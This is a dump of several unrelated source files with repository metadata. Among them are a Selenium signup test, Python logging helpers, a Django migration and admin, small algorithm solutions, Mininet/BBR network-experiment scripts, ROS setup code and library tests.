home_page = FmHomePage(self.driver)
home_page.get_employer_signUp().click()
sleep(5)
child_window = self.driver.window_handles[-1]
self.driver.close()
self.driver.switch_to.window(child_window)
employee_page = EmployerSignUp(self.driver)
employee_page.get_company().send_keys('Automation Company 123')
employee_page.get_fullName().send_keys('Akash G Krishnan ak')
employee_page.get_email().click()
mobile = self.random_mobile()
email = str(mobile) + '@mailinator.com'
employee_page.get_email().send_keys(email)
password = 'Testing@123'
employee_page.get_password().send_keys(password)
employee_page.get_confirm_password().send_keys(password)
with open('..\TestData\login.txt', 'a') as file:
csv_writer = writer(file)
csv_writer.writerow([email, password])
employee_page.get_signup_button().click()
sleep(3)
assert 'Click on the verification link to activate your account.' in employee_page.get_success_modal().text
employee_page.get_success_confirm().click()
self.driver.get('https://www.mailinator.com/')
self.driver.find_element_by_xpath("//input[@id='addOverlay']").send_keys(mobile)
self.driver.find_element_by_xpath("//input[@id='addOverlay']").send_keys(Keys.ENTER)
self.driver.find_element_by_xpath('//tr[1]//td[3]').click()
self.driver.find_element_by_xpath("//button[contains(text(),'Show Links')]").click()
verification_url = self.driver.find_element_by_xpath("//div[@id='clicklinks']").text
self.driver.get(verification_url)
assert 'Welcome to FoxMatrix' in self.driver.find_element_by_xpath("//h2[contains(text(),'Welcome to FoxMatrix')]").text
self.driver.find_element_by_xpath("//button[contains(text(),'Go to Login')]").click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//input[@name="email"]'))
)
sign_in = SignInPage(self.driver)
sign_in.get_email_field().click()
sign_in.get_email_field().send_keys(email)
sign_in.get_password_field().send_keys(password)
sign_in.get_login_button().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, "//button[contains(text(),'Setup Your Account')]"))
)
def test_employer_signIn(self):
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//input[@name="email"]'))
)
with open('..\TestData\login.txt') as file:
csv_Reader = list(reader(file))[::-1]
self.email =csv_Reader[1][0]
self.password = csv_Reader[1][1]
home_page = FmHomePage(self.driver)
home_page.get_employer_sign_in().click()
sleep(3)
child_window = self.driver.window_handles[-1]
self.driver.close()
self.driver.switch_to.window(child_window)
sign_in = SignInPage(self.driver)
sign_in.get_email_field().click()
sign_in.get_email_field().send_keys(self.email)
sign_in.get_password_field().send_keys(self.password)
sign_in.get_login_button().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.LINK_TEXT, 'Setup Your Account'))
)
| [
"krishnanag1996@gmail.com"
] | krishnanag1996@gmail.com |
600f054f49e78cf24098421655e1523203fa53d8 | 9553ebbc332975477a40be1ca3f333beff9d382c | /my_logger.py | 643c3f75aeb6ba74bcc4323ad85ddf902407827c | [] | no_license | smellycats/SX-UnionKafkaCSClient | f406056ac726968f71373c0199d46c73fbbbff17 | 2a1c52bdce32e7e30e2f1f23edfae89346cfa0fd | refs/heads/master | 2021-09-05T04:20:48.498408 | 2017-11-28T08:54:35 | 2017-11-28T08:54:35 | 112,099,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,616 | py | import os
import logging
import logging.handlers
def debug_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
logger = logging.getLogger('root')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=20 * 1024 * 1024, backupCount=5)
logger.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s %(filename)s[line:%(lineno)d] \
[%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
rthandler.setFormatter(formatter)
logger.addHandler(rthandler)
def online_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
logger = logging.getLogger('root')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=20 * 1024 * 1024, backupCount=5)
logger.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s [%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
rthandler.setFormatter(formatter)
logger.addHandler(rthandler)
def access_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
access_logger = logging.getLogger('access')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=100 * 1024 * 1024, backupCount=10)
access_logger.setLevel(logging.INFO)
access_logger.addHandler(rthandler)
| [
"smellycat2014@foxmail.com"
] | smellycat2014@foxmail.com |
5c92f6a56671d9890fb4aef4a30287078d8d5c25 | 39a9cd1d168dbd73987385f94ecb968f8eb0be80 | /medicine/migrations/0013_remove_type_med_type.py | a168c64968198db356545acbe34e0105ac956892 | [] | no_license | suhaskm96/medisearch | dc41e05247b0dc7a72fbd26917de3b895407e27e | 629629bcf20396a8c7ed25d384662d15ae7f1c90 | refs/heads/master | 2020-06-24T12:51:33.445648 | 2018-06-15T10:52:38 | 2018-06-15T10:52:38 | 198,967,048 | 1 | 0 | null | 2019-07-26T07:16:01 | 2019-07-26T07:16:00 | null | UTF-8 | Python | false | false | 389 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-04-14 23:00
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('medicine', '0012_type_med_type'),
]
operations = [
migrations.RemoveField(
model_name='type',
name='med_type',
),
]
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
6f1601446984a091f96b9571f04aae8710b12672 | 66765829bd7bad8d56624552a2cb41d9d4576025 | /solved/06/abc189_d.py | 0cdaf3a023d2e406f6287f2a682022187fc5c285 | [] | no_license | murakami10/atc_python | 9c0c935c58b55177586b0aa23a25032b59beaca8 | 98f91f43e4cbfadb35a1de250fca98ae53457023 | refs/heads/main | 2023-03-06T10:05:55.248376 | 2021-02-13T06:29:23 | 2021-02-13T06:29:23 | 320,210,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | N = int(input())
S = []
for i in range(N):
S.append(str(input()))
ans = [[0] * (N + 1) for _ in range(2)]
ans[0][0] = 1
ans[1][0] = 1
for i in range(len(S)):
if S[i] == "AND":
ans[0][i + 1] = ans[0][i]
ans[1][i + 1] = 2 * ans[1][i] + ans[0][i]
else:
ans[0][i + 1] = 2 * ans[0][i] + ans[1][i]
ans[1][i + 1] = ans[1][i]
print(ans[0][-1])
# https://atcoder.jp/contests/abc189/tasks/abc189_d
| [
"m.kyoya777@gmail.com"
] | m.kyoya777@gmail.com |
76cae0ffbd3466e9e2f9290d4d10df7eb386ab9a | 3a534e848c3962ccaad700bdd08bcdaa02f25ddb | /a4/movecircle.py | 43b465bdd17d8e1fbccf626ca43ac4e933632acb | [] | no_license | dragikamov/Advanced_Programming_in_Python | 48460d3b24de46b23e289224bfc3dc06d8f364e9 | db7491de24a54bc7dcac415fc7bd498afc3923d3 | refs/heads/master | 2020-04-27T13:08:24.240850 | 2019-03-07T14:18:18 | 2019-03-07T14:18:18 | 174,357,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | # 350112
# a4 1.py
# Dragi Kamov
# d.kamov@jacobs-university.de
from graphics import *
def main():
win = GraphWin()
for i in range(10):
shape = Rectangle(Point(30, 30), Point(70, 70))
shape.setOutline("red")
shape.setFill("red")
shape.draw(win)
p = win.getMouse()
c = shape.getCenter()
dx = p.getX() - c.getX()
dy = p.getY() - c.getY()
shape.move(dx, dy)
win.close()
main()
| [
"dragikamov@gmail.com"
] | dragikamov@gmail.com |
660d026a4cd37bb499fea685b14e4c17e430fcc2 | ab5cdf8f2de94c327e4679da84f941b1f3c04db4 | /kubernetes/test/test_v1_key_to_path.py | bb33f64a5c5d213fb5766a93b9a0fdc02a60e156 | [
"Apache-2.0"
] | permissive | diannaowa/client-python | a4a92a125178db26004eaef5062f9b1b581b49a8 | 5e268fb0b6f21a535a14a7f968b84ed4486f6774 | refs/heads/master | 2020-12-02T22:06:03.687696 | 2017-06-30T21:42:50 | 2017-06-30T21:42:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_key_to_path import V1KeyToPath
class TestV1KeyToPath(unittest.TestCase):
""" V1KeyToPath unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1KeyToPath(self):
"""
Test V1KeyToPath
"""
model = kubernetes.client.models.v1_key_to_path.V1KeyToPath()
if __name__ == '__main__':
unittest.main()
| [
"mehdy@google.com"
] | mehdy@google.com |
f3bb7cc1fd5db41d05739da7d79ff50bbc8d581e | 7eed7e912038c9a9cdb360aa3c91ac7fcbe7d8a5 | /Chapter13/sort_service.py | a7cd2466b671755179dddc5e8340fac6866caba6 | [
"MIT"
] | permissive | 4n3i5v74/Python-3-Object-Oriented-Programming-Third-Edition | 5228cc99f2e89fe9814140049ea400c29481a664 | 6310577f0a71588cf28d42994b5d9581640b5870 | refs/heads/master | 2023-03-27T08:42:49.488468 | 2021-03-22T03:07:47 | 2021-03-28T05:06:40 | 275,771,956 | 0 | 0 | MIT | 2020-06-29T08:16:50 | 2020-06-29T08:16:49 | null | UTF-8 | Python | false | false | 1,099 | py | import asyncio
import json
from concurrent.futures import ProcessPoolExecutor
def sort_in_process(data):
nums = json.loads(data.decode())
curr = 1
while curr < len(nums):
if nums[curr] >= nums[curr - 1]:
curr += 1
else:
nums[curr], nums[curr - 1] = nums[curr - 1], nums[curr]
if curr > 1:
curr -= 1
return json.dumps(nums).encode()
async def sort_request(reader, writer):
print("Received connection")
length = await reader.read(8)
data = await reader.readexactly(int.from_bytes(length, "big"))
result = await asyncio.get_event_loop().run_in_executor(
None, sort_in_process, data
)
print("Sorted list")
writer.write(result)
writer.close()
print("Connection closed")
loop = asyncio.get_event_loop()
loop.set_default_executor(ProcessPoolExecutor())
server = loop.run_until_complete(
asyncio.start_server(sort_request, "127.0.0.1", 2015)
)
print("Sort Service running")
loop.run_forever()
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
| [
"ketank@packtpub.com"
] | ketank@packtpub.com |
597e6dfa6aa66205665a9db5cf233af448ee78b7 | e495badcd88e4f95ae99f33f8aa740d1e5e7a875 | /0x08-python-more_classes/3-rectangle.py | 7604bd6fe4645a74c0d2a0bee600b626b7b9c889 | [] | no_license | Immaannn2222/holbertonschool-higher_level_programming | 059ed232af3d1ad54e4d7eff97a0dcb4d61585fb | 1c65e5a6d3632f7e28803ebb2699229390883ec7 | refs/heads/master | 2022-12-17T23:42:00.632652 | 2020-09-24T18:02:12 | 2020-09-24T18:02:12 | 259,304,604 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,375 | py | #!/usr/bin/python3
"""Rectangle class"""
class Rectangle:
"""Rectangle proporties"""
def __init__(self, width=0, height=0):
self.width = width
self.height = height
@property
def width(self):
return self.__width
@width.setter
def width(self, value):
if isinstance(value, int):
if value >= 0:
self.__width = value
else:
raise ValueError("width must be >= 0")
else:
raise TypeError("width must be an integer")
@property
def height(self):
return self.__height
@height.setter
def height(self, value):
if isinstance(value, int):
if value >= 0:
self.__height = value
else:
raise ValueError("height must be >= 0")
else:
raise TypeError("height must be an integer")
def area(self):
return self.__width * self.__height
def perimeter(self):
if self.__height == 0 or self.__width == 0:
return 0
return self.__width * 2 + self.__height * 2
def __str__(self):
if self.__height <= 0 or self.__width <= 0:
return ""
new_str = ""
for x in range(self.__height):
new_str += "#" * self.__width
new_str += '\n'
return new_str[:-1]
| [
"imennaayari@gmail.com"
] | imennaayari@gmail.com |
9e6c62a0b8c8c640c66886053a78168485cff232 | 077c91b9d5cb1a6a724da47067483c622ce64be6 | /fuzz_pyretic_mesh_proactive_firewall_no_close_check_loop_mcs_with_max_replays_5/interreplay_35_l_3/openflow_replay_config.py | 34b65c25622a41540245bfa018421a1f35b62a19 | [] | no_license | Spencerx/experiments | 0edd16398725f6fd9365ddbb1b773942e4878369 | aaa98b0f67b0d0c0c826b8a1565916bf97ae3179 | refs/heads/master | 2020-04-03T10:11:40.671606 | 2014-06-11T23:55:11 | 2014-06-11T23:55:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py |
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow import OpenFlowReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd='./pyretic.py -m p0 pyretic.examples.firewall_for_sts_no_close', label='c1', address='127.0.0.1', cwd='../pyretic', kill_cmd='ps aux | grep -e pox -e pyretic | grep -v simulator | cut -c 9-15 | xargs kill -9')],
topology_class=MeshTopology,
topology_params="num_switches=3",
patch_panel_class=BufferedPatchPanel,
multiplex_sockets=False,
kill_controllers_on_exit=True)
control_flow = OpenFlowReplayer(simulation_config, "experiments/fuzz_pyretic_mesh_proactive_firewall_no_close_check_loop_mcs/interreplay_35_l_3/events.trace")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'None'
| [
"cs@cs.berkeley.edu"
] | cs@cs.berkeley.edu |
4c54990b4fdbf3433f3e4d0b319960ecfb420659 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/era5_scripts/02_preprocessing/lag82/563-tideGauge.py | edc98a675063801b2e15b98450b11705c42804f6 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,984 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
dir_in = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
dir_out = '/lustre/fs0/home/mtadesse/eraFiveLag'
def lag():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
x = 563
y = 564
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
# #check if the file exists
# os.chdir(dir_out)
# if (os.path.isfile(tg_name)):
# print('file already exists')
# continue
#cd to where the actual file is
os.chdir(dir_in)
pred = pd.read_csv(tg_name)
pred.sort_values(by = 'date', inplace=True)
pred.reset_index(inplace = True)
pred.drop('index', axis = 1, inplace = True)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
#note here that since ERA20C has 3hrly data
#the lag_hrs is increased from 6(eraint) to 11 (era20C)
time_lagged = pd.DataFrame()
lag_hrs = [0, 6, 12, 18, 24, 30]
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
#datafrmae that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
#merge the selected tlagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
b8b3aa3da22010a0dbb13fa9eae2bcadfe7846f4 | 636411baa2fc5b5c81710b37d6c53fa7076b9026 | /BST/find_first_greater_than_k.py | 12b3afc941d7a7ff0be4c0c824ceb1a71ea54c17 | [] | no_license | tberhanu/elts-of-coding | 9d90fb23db829c1b41782e2f96978ea9bde59484 | f17881c5732853935bc36b93d00ff58e7f759ed6 | refs/heads/master | 2023-01-04T13:28:31.315542 | 2020-10-30T01:24:48 | 2020-10-30T01:24:48 | 297,862,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,369 | py | from BST.detail_note import BSTNode
from BST import is_binary_tree_bst
from BST import sample_bst
def find_first_greater_than_k(tree, k):
"""
Given a BST TREE and value K, return the closest number that is greater than K from the BST.
Strategy:
If the node value is less than k, COMPLETELY IGNORE IT, and continue searching to the RIGHT, but
if the node value is greater than k, that is a POSSIBLE CANDIDATE, so save that SUBTREE or VALUE,
and keep searching to the LEFT in case you get another node with value greater than k but less
than the previously saved node value, which means if we get another value greater than K but more
closer to K.
Time: O(H) where H is the BST tree height, O(log N).
Space: O(1)
"""
best_value_so_far = None
while tree:
if tree.data > k:
best_value_so_far = tree.data
tree = tree.left
else:
tree = tree.right
return best_value_so_far
if __name__ == "__main__":
bst = BSTNode(990, BSTNode(200, BSTNode(188), BSTNode(299)), BSTNode(1000, BSTNode(999), BSTNode(1001)))
print(is_binary_tree_bst.is_binary_tree_bst(bst))
result = find_first_greater_than_k(bst, 299)
print(result)
print(is_binary_tree_bst.is_binary_tree_bst(sample_bst))
print(find_first_greater_than_k(sample_bst, 99))
| [
"tberhanu@berkeley.edu"
] | tberhanu@berkeley.edu |
a33ad1849151ab394185e17bf2023a657ad79628 | 0f1746146e1514bf20c25135cc624353d9c1a08e | /library/tests/test_utils.py | eac382d89c2518bb45a057b1b36500217a1f392b | [
"MIT"
] | permissive | kklimek/i2cdevice-python | 4bdb9ed46c109e78bc54cf512b98029705e34f10 | 54690cea60cbd91d8abffad38dcba3475236439b | refs/heads/master | 2020-08-04T06:20:40.253068 | 2019-10-01T07:37:15 | 2019-10-02T13:59:32 | 212,036,695 | 0 | 0 | MIT | 2019-10-01T07:28:23 | 2019-10-01T07:28:23 | null | UTF-8 | Python | false | false | 898 | py | from i2cdevice import _mask_width, _leading_zeros, _trailing_zeros, _int_to_bytes
import pytest
def test_mask_width():
assert _mask_width(0b111) == 3
assert _mask_width(0b101) == 3
assert _mask_width(0b0111) == 3
assert _mask_width(0b1110) == 3
def test_leading_zeros():
assert _leading_zeros(0b1) == 7
assert _leading_zeros(0b10) == 6
assert _leading_zeros(0b100) == 5
assert _leading_zeros(0b100000000) == 8 # 9nth bit not counted by default
def test_trailing_zeros():
assert _trailing_zeros(0b1) == 0
assert _trailing_zeros(0b10) == 1
assert _trailing_zeros(0b100) == 2
assert _trailing_zeros(0b00000000) == 8 # Mask is all zeros
def test_int_to_bytes():
assert _int_to_bytes(512, 2) == b'\x02\x00'
assert _int_to_bytes(512, 2, endianness='little') == b'\x00\x02'
with pytest.raises(TypeError):
_int_to_bytes('', 2)
| [
"phil@gadgetoid.com"
] | phil@gadgetoid.com |
64121605ca20b778ed7290a0e87d052fbb42dfd3 | 0cff676ec482e23ee4d9867659f553aa3b7c7a3d | /bin/alert-cloudwatch | 7873c24de514052ecc7a0799763db3b407e84069 | [
"Apache-2.0"
] | permissive | jaxxstorm/alerta | 46db7e510ca3cc430e0235a526752615ad2bed18 | af33dc951305134792f03b3ea0d8e49c32d69918 | refs/heads/master | 2020-12-25T03:20:19.934180 | 2014-06-21T20:58:44 | 2014-06-21T20:58:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | #!/usr/bin/env python
########################################
#
# alert-cloudwatch - Alert AWS CloudWatch
#
########################################
import os
import sys
possible_topdir = os.path.normpath(os.path.join(os.path.abspath(sys.argv[0]),
os.pardir,
os.pardir))
if os.path.exists(os.path.join(possible_topdir, 'alerta', '__init__.py')):
sys.path.insert(0, possible_topdir)
from alerta.common import config
from alerta.common import log as logging
from alerta.cloudwatch.daemon import CloudWatchDaemon, __version__
LOG = logging.getLogger('alerta.cloudwatch')
CONF = config.CONF
if __name__ == '__main__':
config.parse_args(version=__version__)
logging.setup('alerta')
cloudwatch = CloudWatchDaemon('alert-cloudwatch')
cloudwatch.start()
| [
"nick.satterly@guardian.co.uk"
] | nick.satterly@guardian.co.uk | |
53435264f240904694179d2c3e32b6a930f22b9d | a88db875957d20f349d80cff48572ceb60881840 | /bbr.py | dd6f495db12ecc8bd708c5fb2a0113a96f783803 | [] | no_license | mfkiwl/when-to-use-bbr | 5f7d0f31768f93f2dc5448b8b9505860fcb1c4e2 | a5eb4919d2193cbb750ee982df9f9c449afdf16c | refs/heads/master | 2023-04-29T00:25:18.413169 | 2021-05-08T20:22:54 | 2021-05-08T20:22:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,084 | py | import argparse
import mininet.topo
import mininet.net
import mininet.node
import mininet.link
import mininet.net
import mininet.util
import mininet.clean
from remote import RemoteHost, RemoteSSHLink, RemoteOVSSwitch
class Topology(mininet.topo.Topo):
def __init__(self, config):
self.config = config
# in Section 3.1, the paper mentioned that the delay between h1/h2 and h3 is 40us
self._min_delay = "{0}us".format(40 / 2)
super(Topology, self).__init__()
def build(self):
h1 = self.addHost("h1")
h2 = self.addHost("h2")
h3 = self.addHost("h3", server=self.config.remote_host, user=self.config.remote_user,
port=self.config.remote_host_port)
s1 = self.addSwitch("s1")
# add link
self.addLink(h1, s1, bw=self.config.bw, delay=self._min_delay)
self.addLink(h2, s1, bw=self.config.bw, delay=self._min_delay)
self.addLink(s1, h3, bw=self.config.bw, delay="{0}ms".format(self.config.rtt / 2))
def run(configs):
# clean up previous mininet runs in case of crashes
mininet.clean.cleanup()
topology = Topology(configs)
if configs.remote_host != "localhost":
net = mininet.net.Mininet(topology, host=RemoteHost, link=RemoteSSHLink, switch=RemoteOVSSwitch,
waitConnected=True)
else:
net = mininet.net.Mininet(topology, host=mininet.node.CPULimitedHost, link=mininet.link.TCLink)
net.start()
if configs.debug:
# test out the component
mininet.util.dumpNetConnections(net)
net.pingAll()
# clean up at the end
mininet.clean.cleanup()
def main():
parser = argparse.ArgumentParser("BBR experiments")
parser.add_argument("-c", "--congestion-control", choices=["bbr", "cubic"], default="bbr",
help="h1 and h2 congestion control algorithm type", type=str, dest="cc")
parser.add_argument("--rtt", choices=[5, 10, 25, 50, 75, 100, 150, 200], default=5,
help="RTT for the bottle net link", type=int, dest="rtt")
parser.add_argument("--bw", choices=[10, 20, 50, 100, 250, 500, 1000], default=10,
help="Bandwidth for the bottleneck link", type=int, dest="bw")
parser.add_argument("-s", "--size", "--buffer-size", choices=[0.1, 1, 10, 20, 50], default=0.1,
help="Switch buffer size", type=float, dest="size")
parser.add_argument("--remote-host", default="localhost", type=str, dest="remote_host",
help="remote host name/IP address")
parser.add_argument("--remote-host-port", default=22, type=int, dest="remote_host_port",
help="remote host port number to ssh in")
parser.add_argument("--remote-user", default="", type=str, dest="remote_user",
help="remote host user name")
parser.add_argument("--debug", action="store_true", dest="debug")
args = parser.parse_args()
# run the experiments
run(args)
if __name__ == "__main__":
main()
| [
"keyi@stanford.edu"
] | keyi@stanford.edu |
d07b6032abc8c0e3f237db652599fa785edfa2dc | 488c20476d5528c7e942e09f4c88422f67b86853 | /pages/admin.py | c117c10318328e8ee13a42ba8672a5148b952413 | [] | no_license | DaniTodorowa/DjangoToHeroku | e8b600cd07a5864905d6a34f08edcc31a69e4e1b | 2df26ecc429cdca0643c174d81ff77ca5930e145 | refs/heads/master | 2023-02-05T17:17:32.756299 | 2020-12-21T19:10:22 | 2020-12-21T19:10:22 | 319,601,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | from django.contrib import admin
from pages.models import Team
from django.utils.html import format_html
class TeamAdmin(admin.ModelAdmin):
def thumbnail(self, object):
return format_html('<img src="{}" width="40" style="border-radius:50px;" />'.format(object.photo.url))
thumbnail.short_description = 'Photo'
list_display = ('id', 'thumbnail', 'first_name', 'designation', 'created_date')
list_display_links = ('id', 'thumbnail', 'first_name')
search_fields = ('first_name', 'last_name', 'designation')
list_filter = ('designation',)
admin.site.register(Team, TeamAdmin)
| [
"danitodorova2106@gmail.com"
] | danitodorova2106@gmail.com |
86cab9c16847bab1698333842dec26244522d89a | f1d3aabacc69d1622e6005100e9d2f139b08e4f3 | /chapter_5/ch5-40.naming.py | a12c706f6277c5ce300306fa60ba5acec216f12d | [] | no_license | tschoi6712/HelloCodingPython | 2d49369df97c2eb3b87823ab084674f49e653043 | 0701dcb4715c4e15d049843e82042f92a5784a97 | refs/heads/master | 2020-07-27T08:16:43.291222 | 2019-09-17T10:44:52 | 2019-09-17T10:44:52 | 209,026,500 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 618 | py | """""""""""""""""""""""""""
코드에 이름 붙이기
"""""""""""""""""""""""""""
# 주석이 붙어 있는 코드
number_input = input("숫자 입력> ")
radius = float(number_input)
print(2 * 3.14 * radius) # 원의 둘레
print(3.14 * radius * radius) # 원의 넓이
# 함수를 횔용한 코드
PI = 3.14
def number_input():
output = input("숫자 입력> ")
return float(output)
def get_circumference(radius):
return 2 * PI * radius
def get_circle_area(radius):
return PI * radius * radius
radius = number_input()
print(get_circumference(radius))
print(get_circle_area(radius))
| [
"tschoi6712@gmail.com"
] | tschoi6712@gmail.com |
9b2b8d9a504e1ddc561e1f9a302d6c4958662e9b | 0b751bab8d276d976e18b174e12fb26299b0a0fa | /cmake-build-debug/catkin_generated/generate_cached_setup.py | b0895402ca4143a9357dbcd96b673750652bc7f4 | [] | no_license | sukai33/stereo_camera | 9e8fd7c7175c863f65b87c02ef3dd50ea44f5bc3 | 5d2969c51e73c5b5c0a5b4e1fd4ea39aae54d788 | refs/heads/master | 2022-12-31T14:39:38.244507 | 2020-10-24T14:38:07 | 2020-10-24T14:38:07 | 306,902,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,382 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in '/home/ty/Workspace/ROS/study_ws/devel;/opt/ros/melodic'.split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/ty/Workspace/ROS/study_ws/src/stereo_camera/cmake-build-debug/devel/env.sh')
output_filename = '/home/ty/Workspace/ROS/study_ws/src/stereo_camera/cmake-build-debug/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
# print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"422168787@qq.com"
] | 422168787@qq.com |
6ced28b132958d66dd3e4dfcf2043949abc92e14 | 84f3814b595dd362188d8c3b8ba54f80031655a0 | /tangyudi/base/numpy/numpy_4.py | 25a2b556c6fc21f7b56e50277d00d9a482cdd965 | [] | no_license | qisionline/py_stu | 56f1698aad1bc104e260e7d54f55b84aee193813 | 5bafb6296a1f583df2b43defc3061f7093079ab6 | refs/heads/master | 2023-06-20T00:06:22.793170 | 2021-07-05T07:06:24 | 2021-07-05T07:06:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py |
import numpy as np
a=np.arange(12)
b=a
print(b is a)
b.shape=3,4
print(a.shape)
print(a)
print(b)
print(id(a))
print(id(b))
c=a.view()
print(c)
a.shape=2,6
print(a)
a[0,4]=55
print(a)
print(c)
print(c is a)
d=a.copy()
print(d is a)
d[0,0]=9999
print(d)
print(a)
| [
"1850094299@qq.com"
] | 1850094299@qq.com |
4ce8f9853c6437d81e11aaaef635f53fd238a39b | e4713c248c857b06a3cb0e9d0d15dd5513b1a8e9 | /phonenumbers/shortdata/region_RS.py | 4348b933951308ad6b2bb7bba8514682199003a3 | [
"MIT",
"Apache-2.0"
